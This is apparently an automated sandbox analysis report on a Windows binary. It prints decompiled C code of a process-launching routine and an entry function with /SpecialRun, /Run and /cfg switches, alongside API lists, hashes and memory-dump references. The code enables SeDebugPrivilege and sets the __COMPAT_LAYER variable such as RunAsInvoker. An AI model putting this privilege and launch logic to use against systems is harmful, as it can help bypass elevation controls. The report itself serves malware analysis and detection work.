                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                0x004022d5
                                                                                                                0x004022dd
                                                                                                                0x004022e7
                                                                                                                0x004022ec
                                                                                                                0x004022f7
                                                                                                                0x004022fa
                                                                                                                0x004022fd
                                                                                                                0x00402300
                                                                                                                0x00402307
                                                                                                                0x0040230d
                                                                                                                0x0040230e
                                                                                                                0x00402318
                                                                                                                0x00402321
                                                                                                                0x00402324
                                                                                                                0x00402327
                                                                                                                0x0040232a
                                                                                                                0x0040232d
                                                                                                                0x00402334
                                                                                                                0x00402337
                                                                                                                0x0040233e
                                                                                                                0x0040234f
                                                                                                                0x00402356
                                                                                                                0x0040235b
                                                                                                                0x0040235e
                                                                                                                0x0040236d
                                                                                                                0x00402374
                                                                                                                0x0040237e
                                                                                                                0x00402395
                                                                                                                0x004023a0
                                                                                                                0x004023a0
                                                                                                                0x004023ac
                                                                                                                0x004023cf
                                                                                                                0x004023d2
                                                                                                                0x004023d9
                                                                                                                0x004023de
                                                                                                                0x004023f6
                                                                                                                0x00402403
                                                                                                                0x00402414
                                                                                                                0x00402419
                                                                                                                0x00402403
                                                                                                                0x0040241a
                                                                                                                0x00402423
                                                                                                                0x00402458
                                                                                                                0x0040245d
                                                                                                                0x00402464
                                                                                                                0x00402467
                                                                                                                0x00402468
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402425
                                                                                                                0x00402428
                                                                                                                0x0040242b
                                                                                                                0x00402433
                                                                                                                0x00402434
                                                                                                                0x00402473
                                                                                                                0x00402473
                                                                                                                0x0040247c
                                                                                                                0x00402481
                                                                                                                0x00402488
                                                                                                                0x00402488
                                                                                                                0x00402495
                                                                                                                0x0040249a
                                                                                                                0x004024b7
                                                                                                                0x004024be
                                                                                                                0x004024cd
                                                                                                                0x004024d1
                                                                                                                0x004024ed
                                                                                                                0x004024f0
                                                                                                                0x00402506
                                                                                                                0x0040250b
                                                                                                                0x00402512
                                                                                                                0x00402518
                                                                                                                0x00402519
                                                                                                                0x0040251e
                                                                                                                0x00402524
                                                                                                                0x00402527
                                                                                                                0x0040252b
                                                                                                                0x00402530
                                                                                                                0x00402531
                                                                                                                0x00402531
                                                                                                                0x0040253d
                                                                                                                0x0040255a
                                                                                                                0x00402561
                                                                                                                0x00402570
                                                                                                                0x00402574
                                                                                                                0x00402590
                                                                                                                0x00402593
                                                                                                                0x004025a9
                                                                                                                0x004025ae
                                                                                                                0x004025b5
                                                                                                                0x004025bb
                                                                                                                0x004025bc
                                                                                                                0x004025c1
                                                                                                                0x004025c7
                                                                                                                0x004025ca
                                                                                                                0x004025cd
                                                                                                                0x004025ce
                                                                                                                0x004025d4
                                                                                                                0x004025d4
                                                                                                                0x004025da
                                                                                                                0x004025e3
                                                                                                                0x004025eb
                                                                                                                0x00402633
                                                                                                                0x004025fb
                                                                                                                0x00402608
                                                                                                                0x0040260f
                                                                                                                0x00402614
                                                                                                                0x00402624
                                                                                                                0x00402630
                                                                                                                0x00402630
                                                                                                                0x0040263a
                                                                                                                0x0040263b
                                                                                                                0x00402646
                                                                                                                0x0040264b
                                                                                                                0x0040264c
                                                                                                                0x0040265a
                                                                                                                0x0040265a
                                                                                                                0x0040265d
                                                                                                                0x00402666
                                                                                                                0x00402668
                                                                                                                0x00402668
                                                                                                                0x00402672
                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                0x00408533
                                                                                                                0x00408533
                                                                                                                0x00408536
                                                                                                                0x0040853e
                                                                                                                0x00408546
                                                                                                                0x0040854d
                                                                                                                0x00408559
                                                                                                                0x00408563
                                                                                                                0x00408569
                                                                                                                0x00408572
                                                                                                                0x00408583
                                                                                                                0x0040858d
                                                                                                                0x00408595
                                                                                                                0x0040859e
                                                                                                                0x004085a2
                                                                                                                0x004085a6
                                                                                                                0x004085aa
                                                                                                                0x004085ae
                                                                                                                0x004085b8
                                                                                                                0x004085c1
                                                                                                                0x004085c8
                                                                                                                0x004085cd
                                                                                                                0x004085cf
                                                                                                                0x0040867f
                                                                                                                0x00408688
                                                                                                                0x0040868d
                                                                                                                0x0040868f
                                                                                                                0x00408730
                                                                                                                0x00408735
                                                                                                                0x00408737
                                                                                                                0x0040873d
                                                                                                                0x00408750
                                                                                                                0x0040875d
                                                                                                                0x00408763
                                                                                                                0x00408770
                                                                                                                0x00408775
                                                                                                                0x00408779
                                                                                                                0x0040878b
                                                                                                                0x00408790
                                                                                                                0x004087a2
                                                                                                                0x004087aa
                                                                                                                0x004087b8
                                                                                                                0x004087be
                                                                                                                0x004087c3
                                                                                                                0x004087c9
                                                                                                                0x004087d2
                                                                                                                0x004087df
                                                                                                                0x004087e3
                                                                                                                0x004087e6
                                                                                                                0x00408801
                                                                                                                0x004087e8
                                                                                                                0x004087f8
                                                                                                                0x004087fe
                                                                                                                0x00408811
                                                                                                                0x00408816
                                                                                                                0x00408816
                                                                                                                0x0040881c
                                                                                                                0x00408822
                                                                                                                0x00408779
                                                                                                                0x00408824
                                                                                                                0x00408829
                                                                                                                0x00408833
                                                                                                                0x00408834
                                                                                                                0x00408840
                                                                                                                0x00408848
                                                                                                                0x0040884c
                                                                                                                0x00408850
                                                                                                                0x00408855
                                                                                                                0x0040885a
                                                                                                                0x00408860
                                                                                                                0x004088ac
                                                                                                                0x004088b1
                                                                                                                0x004088b3
                                                                                                                0x004088bf
                                                                                                                0x004088c5
                                                                                                                0x004088cb
                                                                                                                0x004088da
                                                                                                                0x004088ea
                                                                                                                0x004088ed
                                                                                                                0x004088f8
                                                                                                                0x004088ff
                                                                                                                0x00408905
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x00000000
                                                                                                                0x00408862
                                                                                                                0x00408862
                                                                                                                0x0040886d
                                                                                                                0x00408874
                                                                                                                0x0040887b
                                                                                                                0x00408882
                                                                                                                0x00408889
                                                                                                                0x00408895
                                                                                                                0x00408897
                                                                                                                0x00408658
                                                                                                                0x00408658
                                                                                                                0x0040865d
                                                                                                                0x00408661
                                                                                                                0x0040866a
                                                                                                                0x00408673
                                                                                                                0x00408678
                                                                                                                0x00000000
                                                                                                                0x00408678
                                                                                                                0x00408860
                                                                                                                0x00408695
                                                                                                                0x00408695
                                                                                                                0x0040869f
                                                                                                                0x004086a2
                                                                                                                0x004086af
                                                                                                                0x004086a4
                                                                                                                0x004086a7
                                                                                                                0x004086a7
                                                                                                                0x004086b4
                                                                                                                0x004086bf
                                                                                                                0x004086cb
                                                                                                                0x004086d3
                                                                                                                0x004086d7
                                                                                                                0x004086db
                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
